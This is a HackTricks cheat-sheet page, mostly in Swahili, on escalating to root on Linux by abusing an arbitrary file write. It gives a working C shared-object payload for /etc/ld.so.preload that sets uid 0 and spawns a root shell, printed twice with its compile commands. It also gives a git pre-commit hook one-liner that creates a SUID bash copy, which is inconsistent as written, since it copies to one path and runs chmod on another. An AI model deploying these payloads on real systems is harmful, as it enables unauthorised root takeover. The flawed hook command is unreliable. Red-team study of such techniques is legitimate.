Arbitrary File Write to Root

Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

/etc/ld.so.preload

Faili hii inafanya kazi kama LD_PRELOAD env variable lakini pia inafanya kazi katika SUID binaries. Ikiwa unaweza kuunda au kubadilisha, unaweza kuongeza tu njia ya maktaba ambayo itapakiwa na kila binary inayotekelezwa.

Kwa mfano: echo "/tmp/pe.so" > /etc/ld.so.preload

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Git hooks

Git hooks ni scripts ambazo zina endesha kwenye matukio mbalimbali katika hazina ya git kama wakati commit inaundwa, merge... Hivyo kama script au mtumiaji mwenye mamlaka anafanya vitendo hivi mara kwa mara na inawezekana kuandika kwenye folda ya .git, hii inaweza kutumika kwa privesc.

Kwa mfano, inawezekana kuunda script katika hazina ya git kwenye .git/hooks ili kila wakati inatekelezwa wakati commit mpya inaundwa:

echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit

Cron & Time files

TODO

Service & Socket files

TODO

binfmt_misc

Fail iliyoko katika /proc/sys/fs/binfmt_misc inaonyesha ni binary ipi inapaswa kutekeleza aina gani ya faili. TODO: angalia mahitaji ya kutumia hii kutekeleza rev shell wakati aina ya faili ya kawaida imefunguliwa.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousLinux Privilege Escalation NextCisco - vmanage

Last updated 4 days ago

#include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unlink("/etc/ld.so.preload"); setgid(0); setuid(0); system("/bin/bash"); } //cd /tmp //gcc -fPIC -shared -o pe.so pe.c -nostartfiles